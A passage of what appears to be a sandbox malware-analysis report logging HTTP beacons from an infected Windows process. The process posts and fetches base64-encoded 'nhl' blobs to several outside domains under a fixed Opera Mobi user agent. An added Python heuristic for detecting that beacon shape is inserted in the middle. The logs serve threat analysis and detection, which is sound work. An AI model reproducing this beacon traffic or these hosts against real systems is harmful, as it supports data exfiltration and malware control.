                                                                                                                                                                Data Ascii: nhl=t3ky2O7JLmFd5QYCBzKKZbt0qGo4GVSqXZv88WVnsFzmgmvY3Oh1S4CgF73Oh0OzsjCmEeFvvUBAq0e9m1pGb8u7mDvUfNj0XrvpfxZtFwe14PGiZKHZGM2eO1JOZGzmQe0Ddp+sx6zfHxaJjvrPjUK90/82++au+LNyezswpXceJ3JSVYCKQFvIG/Zymcp72xpJSVHGpa6vj9Q+hhvxdMPnHcnnkcll1n08pYzWJAUlpXFrMdcfjxqwBmqP4lUVSW5E67AedjW1VfNGcHBYWRu4Pdxzb8bxlbdpg8tlDbQzsXeM/4Ij0l3nkFzZSP3No0lzFSWtrAKWdJDE1IUEb7Pdnx7QEt+YNxAiuMaYqA4hHse2Ytvu7o30vNRmrkdu/wbDisnjFKol4s9w/ddnSuUXKqnVuzHPG6m5x5xMAxa3EL0D1Yz0sY2+E2i6/c3X5sFOkoK+wKG0GKCYRQLMMaJuZbwfMjimhBP+iO89NkH9grHzjWKSCoi9gtEPrgCxymwv/Q139GkocUN7rBRLxhN0D4dwUKnkwZHBbmsUcdraDt8p+7yFKeS3cN0NTAVawLgCiS5OL8jDuQZLLSRLSOka20PtoZ48AUj1FAEWX/PF+u3AN68SwxbVYpryA6HQlrJVm49W7nJA8+E5mqwtej+Q7U+xTvcw0DAy1bI8TFcNccC0CyKlK4tzFotKMyh2ww2Pst22nmnOmUH1y+KncvpjR1cbz7fzYVQRilnqPwDyigEVrQt2lKYEcnLq5OiEQLis8WHQK1k2CkHEii4xKGhk6/w/rDL6ttBpB7f3g5X9cZ9WxlGDx11LmBKVrh87aRpwKC9Hxbtkw6oVOHO6mFW8aHqsXAKIhwCUl28B0hgBrtSZFHAmAg9VNu2lhe80q2T/3lCD0AgGrBbSRY9IAFlbFftDuJdI6DHus8h6OM9JtPAGMRKHPKR69Y+F62Y+oyvVhrwTiGGBhtDDI+Q+CbdM9ZjIQbHHYRwE8jr3RapeR1WI [TRUNCATED]
Oct 9, 2024 13:03:34.045167923 CEST | 1169 | OUT | Data Raw: 65 54 49 57 67 64 73 6f 39 6e 6d 31 30 61 78 44 7a 69 77 7a 6f 57 46 37 63 65 5a 6d 38 39 59 52 76 54 4b 68 70 51 39 69 63 4c 42 49 6b 48 43 51 62 39 38 43 4d 51 78 39 52 48 47 68 4e 76 75 36 72 31 69 4e 4b 48 69 43 37 34 68 64 38 54 6b 78 7a 62
                                                                                                                                                                Data Ascii: eTIWgdso9nm10axDziwzoWF7ceZm89YRvTKhpQ9icLBIkHCQb98CMQx9RHGhNvu6r1iNKHiC74hd8TkxzbACx4rcpJcJNbm8O9vvaNgdrC0HKHvKYHL8LE/1t/Z3hWtVjteEotmCGlam+CQOL6b9/91lGcZTUP8LAfWEQpR6RnOb0kiy+C2Yft01VtVOIN/eqeo9pY1vVhTPDSI4hjKAjXkSA4HUgsF+VDb1GMoZJR7mzxfQtGt
Oct 9, 2024 13:03:34.242644072 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 09 Oct 2024 11:03:34 GMT
vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
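
Added example, not part of the Joe Sandbox report: a small Python heuristic that parses raw HTTP/1.1 requests and flags the beacon shape visible in the sessions above (the fixed Opera Mobi user agent, a single four-character directory as the path, one short-keyed base64-alphabet blob carried in the query string or in the form body, and a POST whose Origin and Referer point back at its own Host and path). The sample requests are constructed to mirror sessions 12 and 13: the hostnames, paths and user agent are the report's, the blob is synthetic, and the indicator names, length thresholds and the three-hit cut-off are assumptions chosen for illustration rather than documented FormBook behaviour.

```python
"""Heuristic flagging of the HTTP beacon shape seen in the sessions above.

Added example; not part of the Joe Sandbox report.  Indicator names, the
length thresholds and the hit cut-off are assumptions for illustration.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Every request in the report carries this exact User-Agent string.
OPERA_MOBI_UA = ("Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) "
                 "Presto/2.5.28 Version/10.1")
# Every request targets a single four-character directory (/x7ji/, /f06i/).
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")
# The payload is one short key carrying a long base64-alphabet blob.
B64_RE = re.compile(r"^[A-Za-z0-9+/=]+$")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: str
    headers: dict[str, str]
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.1 request (CRLF or LF line endings) into its parts."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # first colon only; values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body)


def _params(encoded: str) -> list[tuple[str, str]]:
    """Split a query string or x-www-form-urlencoded body into (key, value) pairs."""
    pairs = []
    for kv in encoded.split("&"):
        key, sep, value = kv.partition("=")
        if sep:
            pairs.append((key, value))
    return pairs


def score_request(req: HttpRequest) -> list[str]:
    """Return the names of the indicators the request matches (empty list = none)."""
    hits = []
    if req.headers.get("user-agent") == OPERA_MOBI_UA:
        hits.append("opera-mobi-ua")
    if PATH_RE.match(req.path):
        hits.append("four-char-dir")
    payload = req.query if req.method == "GET" else req.body
    for key, value in _params(payload):
        # Assumed thresholds: key of at most 3 chars, blob of at least 64 chars.
        if len(key) <= 3 and len(value) >= 64 and B64_RE.match(value):
            hits.append(f"b64-blob:{key}")
            break
    if req.method == "POST":
        host = req.headers.get("host", "")
        if (req.headers.get("origin") == f"http://{host}"
                and req.headers.get("referer") == f"http://{host}{req.path}"):
            hits.append("self-referencing-origin")
    return hits


def is_beacon(raw: str, min_hits: int = 3) -> bool:
    """True when at least min_hits indicators match; the cut-off is an assumption."""
    return len(score_request(parse_request(raw))) >= min_hits


# Constructed sample traffic mirroring sessions 12 and 13; the blob is synthetic.
BLOB = base64.b64encode(bytes(range(64))).decode()
SAMPLE_GET = (
    f"GET /x7ji/?nhl={BLOB}&9X=EvKH2xeP-DpP307P HTTP/1.1\r\n"
    "Accept: */*\r\nAccept-Language: en-US,en;q=0.9\r\n"
    "Host: www.bayarcepat19.click\r\nConnection: close\r\n"
    f"User-Agent: {OPERA_MOBI_UA}\r\n\r\n"
)
_POST_BODY = f"nhl={BLOB}"
SAMPLE_POST = (
    "POST /f06i/ HTTP/1.1\r\nAccept: */*\r\nHost: www.030002304.xyz\r\n"
    f"Content-Length: {len(_POST_BODY)}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    "Origin: http://www.030002304.xyz\r\nReferer: http://www.030002304.xyz/f06i/\r\n"
    f"User-Agent: {OPERA_MOBI_UA}\r\n\r\n{_POST_BODY}"
)
# Constructed benign request for contrast.
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nConnection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in [("GET", SAMPLE_GET), ("POST", SAMPLE_POST), ("benign", SAMPLE_BENIGN)]:
        print(name, is_beacon(raw), score_request(parse_request(raw)))
```

The user agent alone is a weak signal (it is a real, if ancient, browser string), which is why the cut-off requires several indicators together; on the traffic above the POSTs match all four and the GETs three. The parser assumes the form body is not percent-encoded, matching the raw bytes shown in the report (the `+`, `/` and `=` appear literally).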


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.30 | 49837 | 65.21.196.90 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:36.801964998 CEST | 347 | OUT | GET /f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U= HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.030002304.xyz
    Connection: close
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:03:37.015255928 CEST | 1032 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Wed, 09 Oct 2024 11:03:36 GMT
    vary: User-Agent
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.30 | 49838 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:42.360498905 CEST | 616 | OUT | POST /0r1y/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.doggieradio.net
    Cache-Control: max-age=0
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.doggieradio.net
    Referer: http://www.doggieradio.net/0r1y/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Ascii: nhl=gKgTc934Z5y3OEIQ2uufS6W3gDYPo+W4dj6y8C8ctAjJw1m5G/nYqqOa2FA77qAoY2Q0dn7xXnbhqSv/vnZBFtn+1q7tU26Eyt48iXsakglSZhKOesYufN7k/BzN5DL6iFTc/B/BcxqbjAOYy4h5KMggbsOSY9ahLnF/X+OvOTwdsWPPxV8en09YklE8Yq09xg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.30 | 49839 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:44.990825891 CEST | 636 | OUT | POST /0r1y/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.doggieradio.net
    Cache-Control: max-age=0
    Content-Length: 220
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.doggieradio.net
    Referer: http://www.doggieradio.net/0r1y/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Ascii: nhl=gKgTc934Z5y3Ol4Q0ImfVaW0vjYPneW8dj2y8GFHtWTJ3XO5H+nYpqOauVBw1KAdY2c8dmHxXjLhqS//vUxCD9ngsa7VbW6Eyt48iX48khBSZQ6OYNYtXt7n8BzNzjL2iFS//BPnczCbjA+Y1ph6EMhlWMPuZvHEO355esSAESA3pB+VsWIc0UB14kpUao1mslBUuFbCWIHOtoq+AlUXHss=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.30 | 49840 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:47.632370949 CEST | 1289 | OUT | POST /0r1y/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.doggieradio.net
    Cache-Control: max-age=0
    Content-Length: 3336
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.doggieradio.net
    Referer: http://www.doggieradio.net/0r1y/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=[TRUNCATED]
Oct 9, 2024 13:03:47.632419109 CEST | 2464 | OUT | Data Raw: 6c 2b 78 6c 4f 55 6f 47 39 30 57 59 6c 4d 45 48 58 74 36 33 32 73 69 52 41 32 47 51 61 76 50 39 6f 5a 46 4e 65 56 4c 74 6c 6d 48 50 2b 72 32 51 74 6d 6c 76 78 2f 41 78 71 57 62 4c 52 70 58 34 2f 6e 72 48 6e 66 69 49 6f 67 4e 63 30 75 53 54 77 4e
                                                                                                                                                                Data Ascii: l+xlOUoG90WYlMEHXt632siRA2GQavP9oZFNeVLtlmHP+r2Qtmlvx/AxqWbLRpX4/nrHnfiIogNc0uSTwNxvFKbhhruO8ixGYV0SFUNCSUkkPHlrECNW5JMTS0mQ5RpcIwCtj+3EGX+kK40Z/vBAuMsJ+gAbcsYrmJu0BWkGj4zMrNTdZyqjTRb4n1Ftno0gILSs62rDl0ku+Gomajs1tMkv5oYJnIc3zOi/yzJn5uVhEtnzRMC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.30 | 49841 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:50.267708063 CEST | 349 | OUT | GET /0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.doggieradio.net
    Connection: close
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:03:51.267218113 CEST | 399 | IN | HTTP/1.1 200 OK
    Server: openresty
    Date: Wed, 09 Oct 2024 11:03:51 GMT
    Content-Type: text/html
    Content-Length: 259
    Connection: close
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.30 | 49842 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:56.501013994 CEST | 634 | OUT | POST /sfkd/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.mybartendinglife.club
    Cache-Control: max-age=0
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.mybartendinglife.club
    Referer: http://www.mybartendinglife.club/sfkd/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Ascii: nhl=3dl7H8uZEVc3L2foBjbgnPymIaGkLHR9R1XkP4HZOjNqj9tRuT2jxt8en+2dW/7afFkgp5UiYttywpmxc6Kd13R1NpVWjJfVY15wo3hytuERg/8U9Mzojm2019Rn8exl4JG3V+73vBUIMe5ZNXY9FAuhQWvN/C4AYF83ED1Dg46KshG+leGjuX7OEAccfTiiZw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.30 | 49843 | 3.33.130.190 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:59.144063950 CEST | 654 | OUT | POST /sfkd/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.mybartendinglife.club
    Cache-Control: max-age=0
    Content-Length: 220
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.mybartendinglife.club
    Referer: http://www.mybartendinglife.club/sfkd/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Ascii: nhl=3dl7H8uZEVc3KTXoAAzghvypFKGkS3R5R1LkP5CCOQ5qicdRvS2jid8eve2Ybf7dfFoep8UiYt5ywr+xct2e6HRNLpVQspfVY15wo30ltvsRhPsU8ubrrG27iNRnuuwN4JGeV8PdvEQIMepZNC08OAunPmva5hBIBEgEDQVIsoWgkW3k4dyh93HjYBx0dRj5EyEWIXMZgGq5jOPdPR+NJRg=


Session ID: 23 | Source IP: 192.168.11.30 | Source Port: 49844 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:01.785245895 CEST | 2578 | OUT | POST /sfkd/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.mybartendinglife.club
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.mybartendinglife.club
Referer: http://www.mybartendinglife.club/sfkd/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 33 64 6c 37 48 38 75 5a 45 56 63 33 4b 54 58 6f 41 41 7a 67 68 76 79 70 46 4b 47 6b 53 33 52 35 52 31 4c 6b 50 35 43 43 4f 51 68 71 6a 75 6c 52 75 78 4f 6a 68 64 38 65 6c 2b 32 5a 62 66 37 41 66 47 59 61 70 38 51 59 59 75 42 79 2f 75 71 78 4c 4a 69 65 74 58 52 4e 4a 70 56 56 6a 4a 66 41 59 31 70 30 6f 30 4d 6c 74 76 73 52 68 4b 6f 55 36 38 7a 72 74 47 32 30 31 39 52 72 38 65 78 67 34 49 75 6b 56 38 4c 6e 76 43 6b 49 4d 4e 68 5a 4d 77 73 38 4f 41 75 6e 58 57 76 5a 35 67 39 4a 42 45 4a 46 44 55 70 59 74 5a 79 67 67 43 76 38 72 74 2f 35 68 33 37 32 63 6c 74 50 56 77 54 4f 48 31 4e 33 47 30 56 68 70 54 53 43 6e 72 54 43 56 68 71 56 53 30 67 51 31 78 66 38 39 6c 76 69 49 4d 48 70 73 70 43 2f 2b 6b 64 67 63 6c 51 57 37 4b 51 52 76 78 45 75 64 4b 44 73 42 61 52 6c 75 66 65 73 73 4a 68 61 57 6d 32 64 43 37 32 62 6a 67 62 43 64 78 4b 2f 36 54 4c 6b 56 2b 2b 51 52 2f 54 78 6d 45 4c 76 76 49 6d 38 4c 70 43 39 54 63 73 62 72 75 63 41 6b 57 31 4c 64 68 32 59 44 6c 4d 5a 54 6e 4b 34 6b 6f 31 74 2f 35 [TRUNCATED]
Data Ascii: nhl=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 [TRUNCATED]
Oct 9, 2024 13:04:01.785267115 CEST | 1193 | OUT | Data Raw: 6d 48 78 6b 67 47 39 61 30 56 5a 6a 65 6c 37 4f 6e 47 62 5a 45 30 6c 36 32 72 70 46 58 61 56 6a 7a 30 44 74 6a 53 37 4a 2f 4f 4e 71 57 42 4c 56 62 4b 74 4e 41 52 2f 4a 6b 4b 51 4e 6e 31 4b 71 58 31 4f 32 37 36 51 41 4d 74 6d 74 49 74 6a 45 49 46
Data Ascii: mHxkgG9a0VZjel7OnGbZE0l62rpFXaVjz0DtjS7J/ONqWBLVbKtNAR/JkKQNn1KqX1O276QAMtmtItjEIFk6aFXakyvzRpV0TPoJiLOCd37AAkgeDpx7JmV575xKocf55gCXR1eyRdBUmg7jr1Ysp2stX4xGUHMDoLaG7npbQJcYsaMw5Apqib6CIsTnzswN4x7/vnLJ7Cj3TlE/PrSWiNXjOeAKaHxZBhAENqIn5ojXhZ0XXyM


Session ID: 24 | Source IP: 192.168.11.30 | Source Port: 49845 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:04.420248985 CEST | 355 | OUT | GET /sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.mybartendinglife.club
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:04:04.522494078 CEST | 399 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 09 Oct 2024 11:04:04 GMT
Content-Type: text/html
Content-Length: 259
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 26 6e 68 6c 3d 36 66 4e 62 45 49 57 57 42 32 4a 4a 59 53 2f 78 65 79 33 57 70 76 4b 4a 41 76 79 56 4d 68 64 4b 41 41 6d 2b 64 34 6d 46 43 54 63 4e 76 38 35 4a 78 58 7a 54 33 76 49 35 6b 73 48 38 64 37 58 2b 66 46 4d 39 35 5a 77 6e 4c 34 52 67 37 4f 4b 7a 63 64 36 65 79 32 6c 38 42 61 6c 59 6f 34 7a 57 64 52 64 63 38 43 73 6a 6b 38 38 4d 2f 76 67 36 78 75 6a 31 39 55 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8="}</script></head></html>


Session ID: 25 | Source IP: 192.168.11.30 | Source Port: 49846 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:09.755691051 CEST | 598 | OUT | POST /udtr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.ntn.solar
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.ntn.solar
Referer: http://www.ntn.solar/udtr/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 69 37 66 78 32 65 59 6b 6c 4c 62 44 6c 57 51 6f 48 39 37 66 70 43 76 61 79 59 50 6f 4a 56 68 4b 6b 6e 31 37 71 33 46 30 52 46 65 70 51 6b 47 47 6f 70 73 49 65 41 6e 52 45 73 4f 49 48 7a 67 65 7a 61 58 4b 2f 74 57 6e 38 59 4e 77 53 43 2b 53 59 34 42 2b 48 79 69 31 4a 44 6d 56 48 78 2f 7a 38 45 61 6d 50 59 71 31 65 32 51 53 32 31 50 51 59 77 4d 44 36 30 63 74 31 62 2b 4f 2f 68 71 54 61 6a 33 55 58 6d 4a 6b 69 44 39 69 38 73 79 30 53 33 54 42 61 35 4a 44 30 43 48 73 75 38 5a 58 39 37 55 6b 6f 37 45 33 79 30 48 65 71 47 31 47 66 34 6b 65 51 3d 3d
Data Ascii: nhl=EU5iPXn9SK7EVi7fx2eYklLbDlWQoH97fpCvayYPoJVhKkn17q3F0RFepQkGGopsIeAnREsOIHzgezaXK/tWn8YNwSC+SY4B+Hyi1JDmVHx/z8EamPYq1e2QS21PQYwMD60ct1b+O/hqTaj3UXmJkiD9i8sy0S3TBa5JD0CHsu8ZX97Uko7E3y0HeqG1Gf4keQ==
Oct 9, 2024 13:04:09.858261108 CEST | 1289 | IN | HTTP/1.1 200 OK
date: Wed, 09 Oct 2024 11:04:09 GMT
content-type: text/html; charset=utf-8
content-length: 1106
x-request-id: 88b7572c-6f59-400c-a3e4-dc352f6e099f
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
set-cookie: parking_session=88b7572c-6f59-400c-a3e4-dc352f6e099f; expires=Wed, 09 Oct 2024 11:19:09 GMT; path=/
connection: close
